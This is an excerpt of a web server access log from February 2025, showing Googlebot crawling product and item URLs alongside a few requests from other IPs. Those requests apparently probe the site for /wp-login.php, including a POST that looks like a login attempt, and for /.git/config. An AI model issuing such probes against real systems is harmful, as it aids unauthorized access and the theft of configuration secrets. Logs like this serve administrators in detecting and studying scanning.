66.249.77.192 - - [05/Feb/2025:17:00:26 -0600] "GET /product/graduation87?c=g&l=20440 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
128.199.157.11 - - [05/Feb/2025:17:09:36 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "http://tjamich.gob.mx/wp-login.php" "Mozilla/5.0"
66.249.77.192 - - [05/Feb/2025:17:13:58 -0600] "GET /product/donate22?c=g&l=39416 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.176.184.61 - - [05/Feb/2025:17:15:29 -0600] "GET /.git/config HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
66.249.77.192 - - [05/Feb/2025:17:15:43 -0600] "GET /product/fierce108?c=g&l=4670 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:17:17:42 -0600] "GET /product/submit87?c=g&l=20445 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.149.92 - - [05/Feb/2025:17:30:21 -0600] "GET /wp-login.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
66.249.77.192 - - [05/Feb/2025:17:40:43 -0600] "GET /product/request87?c=g&l=20445 HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:17:42:29 -0600] "GET /item/aibyj248meqab29253.html HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
